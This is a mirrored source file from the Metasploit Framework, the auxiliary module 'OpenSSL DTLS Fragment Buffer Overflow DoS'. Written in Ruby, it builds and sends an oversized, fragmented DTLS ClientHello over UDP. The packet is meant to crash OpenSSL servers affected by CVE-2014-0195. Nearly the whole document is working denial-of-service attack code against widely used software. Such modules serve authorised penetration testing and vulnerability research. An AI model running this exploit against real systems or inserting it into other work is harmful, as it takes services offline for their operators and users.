Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Dos

8
  include Exploit::Remote::Udp

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS',

15
        'Description' => %q{

16
          This module performs a Denial of Service Attack against Datagram TLS in

17
          OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.

18
          This occurs when a DTLS ClientHello message has multiple fragments and the

19
          fragment lengths of later fragments are larger than that of the first, a

20
          buffer overflow occurs, causing a DoS.

21
        },

22
        'Author' => [

23
          'Juri Aedla <asd[at]ut.ee>', # Vulnerability discovery

24
          'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module

25
        ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          ['CVE', '2014-0195'],

29
          ['ZDI', '14-173'],

30
          ['BID', '67900'],

31
          ['URL', 'http://web.archive.org/web/20150815024234/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002'],

32
          ['URL', 'http://web.archive.org/web/20140707160621/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048']

33
        ],

34
        'DisclosureDate' => '2014-06-05',

35
        'Notes' => {

36
          'Stability' => [CRASH_SERVICE_DOWN],

37
          'SideEffects' => [],

38
          'Reliability' => []

39
        }

40
      )

41
    )

42


43
    register_options([

44
      Opt::RPORT(4433),

45
      OptInt.new('VERSION', [true, 'SSl/TLS version', 0xFEFF])

46
    ])

47
  end

48


49
  def build_tls_fragment(type, length, seq, frag_offset, frag_length, frag_body = nil)

50
    # format is: type (1 byte), total length (3 bytes), sequence # (2 bytes),

51
    # fragment offset (3 bytes), fragment length (3 bytes), fragment body

52
    sol = (seq << 48) | (frag_offset << 24) | frag_length

53
    [

54
      (type << 24) | length,

55
      (sol >> 32),

56
      (sol & 0x00000000FFFFFFFF)

57
    ].pack('NNN') + frag_body

58
  end

59


60
  def build_tls_message(type, version, epoch, sequence, message)

61
    # format is: type (1 byte), version (2 bytes), epoch # (2 bytes),

62
    # sequence # (6 bytes) + message length (2 bytes), message body

63
    es = (epoch << 48) | sequence

64
    [

65
      type,

66
      version,

67
      (es >> 32),

68
      (es & 0x00000000FFFFFFFF),

69
      message.length

70
    ].pack('CnNNn') + message

71
  end

72


73
  def run

74
    # add a small fragment

75
    fragments = build_tls_fragment(1, 2, 0, 0, 1, 'C')

76
    # add a large fragment where the length is significantly larger than that of the first

77
    # TODO: you'll need to tweak the 2nd, 5th and 6th arguments to trigger the condition in some situations

78
    fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234))

79
    message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments)

80
    connect_udp

81
    print_status("#{rhost}:#{rport} - Sending fragmented DTLS client hello packet")

82
    udp_sock.put(message)

83
    disconnect_udp

84
  end

85
end

86


87